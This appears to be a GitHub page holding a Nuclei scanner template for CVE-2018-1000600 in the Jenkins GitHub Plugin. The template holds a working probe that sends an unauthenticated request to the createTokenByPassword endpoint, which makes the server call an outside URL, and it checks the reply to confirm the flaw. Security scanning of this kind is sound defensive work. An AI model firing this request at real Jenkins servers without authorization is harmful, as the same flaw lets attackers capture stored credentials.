forked from coolboy0816/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-1000600.yaml
26 lines (23 loc) · 1.06 KB
/
CVE-2018-1000600.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
id: CVE-2018-1000600
info:
name: CSRF and missing permission checks in Jenkins GitHub Plugin
description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
author: geeknik
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=https://example.com"
redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "<p>This domain is for use in illustrative examples in documents."
part: body
- type: status
status:
- 200